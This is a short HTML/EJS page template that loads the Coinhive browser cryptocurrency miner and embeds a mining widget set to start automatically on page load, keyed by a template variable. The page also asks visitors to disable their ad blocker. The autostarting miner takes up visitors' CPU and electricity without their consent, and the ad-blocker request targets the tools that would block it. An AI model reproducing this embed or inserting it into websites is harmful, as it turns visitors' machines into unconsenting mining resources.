<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
<script src="https://coinhive.com/lib/miner.min.js" async></script>
<h3>Key: <%= key %></h3>
<div class="coinhive-miner" 
	style="width: 256px; height: 310px"
	data-autostart="true"
	data-key="<%= key %>">
	<em>Please disable Adblock!</em>
</div>
</body>
</html>